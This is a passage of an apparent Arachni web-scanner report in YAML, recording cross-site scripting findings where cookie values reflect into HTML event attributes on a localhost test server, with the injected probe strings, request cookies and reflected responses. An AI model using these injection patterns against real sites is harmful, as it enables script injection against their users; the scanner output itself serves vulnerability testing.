      :follow_location: true
      :cookies: 
        onkeypress: default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onkeypress: default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onkeypress
      :id: <a href="/" onkeypress="default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeypress=default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeypress</a><a href='/' onkeypress="default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeypress</a><a href='/' onkeypress='default-onkeypress;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeypress</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onkeypress
    var: onkeypress
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onkeyup
  var: onkeyup
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeyup="default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a>
    injected: default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onkeyup
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onkeyup: default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onkeyup: default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onkeyup
      :id: <a href="/" onkeyup="default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onkeyup=default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onkeyup</a><a href='/' onkeyup="default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeyup</a><a href='/' onkeyup='default-onkeyup;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onkeyup</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onkeyup
    var: onkeyup
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onclick
  var: onclick
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "433"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onclick="default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a>
    injected: default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onclick
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onclick: default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onclick: default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onclick
      :id: <a href="/" onclick="default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onclick=default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onclick</a><a href='/' onclick="default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onclick</a><a href='/' onclick='default-onclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onclick</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onclick
    var: onclick
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/ondblclick
  var: ondblclick
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "460"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" ondblclick="default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a>
    injected: default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: ondblclick
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        ondblclick: default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        ondblclick: default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/ondblclick
      :id: <a href="/" ondblclick="default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' ondblclick=default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>ondblclick</a><a href='/' ondblclick="default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">ondblclick</a><a href='/' ondblclick='default-ondblclick;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>ondblclick</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/ondblclick
    var: ondblclick
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onmousedown
  var: onmousedown
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "469"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmousedown="default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a>
    injected: default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onmousedown
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onmousedown: default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onmousedown: default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onmousedown
      :id: <a href="/" onmousedown="default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmousedown=default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmousedown</a><a href='/' onmousedown="default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousedown</a><a href='/' onmousedown='default-onmousedown;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmousedown</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onmousedown
    var: onmousedown
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onmousemove
  var: onmousemove
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "469"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmousemove="default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a>
    injected: default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onmousemove
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onmousemove: default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onmousemove: default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onmousemove
      :id: <a href="/" onmousemove="default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmousemove=default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmousemove</a><a href='/' onmousemove="default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmousemove</a><a href='/' onmousemove='default-onmousemove;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmousemove</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onmousemove
    var: onmousemove
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onmouseout
  var: onmouseout
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout%3Barachni_xss_in_element_event%3D71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "460"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onmouseout="default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a>
    injected: default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: onmouseout
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        onmouseout: default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :injected: default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        onmouseout: default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/cookie/onmouseout
      :id: <a href="/" onmouseout="default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onmouseout=default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onmouseout</a><a href='/' onmouseout="default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onmouseout</a><a href='/' onmouseout='default-onmouseout;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onmouseout</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/cookie/onmouseout
    var: onmouseout
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: cookie
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/cookie/onmouseover
  var: onmouseover
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
